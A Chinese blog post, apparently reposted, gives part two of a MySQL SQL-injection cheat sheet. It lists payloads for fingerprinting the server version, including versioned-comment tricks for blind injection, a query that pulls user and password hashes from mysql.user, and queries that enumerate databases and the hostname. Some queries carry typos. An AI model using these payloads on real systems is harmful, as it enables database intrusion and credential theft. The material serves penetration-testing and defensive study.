码迷,mamicode.com
首页 > 数据库 > 详细

sql注入知识库-mysql篇(2)

时间:2015-03-08 14:10:38      阅读:184      评论:0      收藏:0      [点我收藏+]

标签:

上接mysql篇(1)

测试数据库版本

1.使用自带函数

version()

@@version

@@global.version

examples

select version();

SELECT * FROM Users WHERE id = ‘1‘ AND MID(VERSION(),1,1) = ‘5‘;

mid() 用于截取字符串,用法  mid(字符串,起始位置,截取几个字符)

 备注:

如果数据库运行在windows的机器上的话输出会带上-nt-log

2.使用特殊代码

1 /*!50094eaea*/ ;   False 如果版本在5.0094或以上

1 /*!50096eaea*/ ;   True  如果版本在5.0096以下

1/*!50095eaea*/ ;   False  如果版本是5.0095

备注:

当你不能将任何sql带入注入位置查询的时候,这个方法可以用于检测数据库版本

数据库凭证

table         mysql.user

columns     user password

current user  user()   current_user()   current_user  system_user()   session_user()

examples:

seclct current_user ;

SELECT CONCAT_WS(0x3A, userpassword) FROM mysql.user WHERE user = ‘root‘-- (Privileged)

数据库名字

table  information_schema.schemata     mysql.db

columns  schema_name     db

currentdb  database()    schema()

examples:

select database();

select schema_name from information_schema.schemata;

select distinct(db) from mysql.db  

主机名

@@hostname

example

select @@hostname;

 

 

 

sql注入知识库-mysql篇(2)

标签:

原文地址:http://www.cnblogs.com/luyg24/p/4321628.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!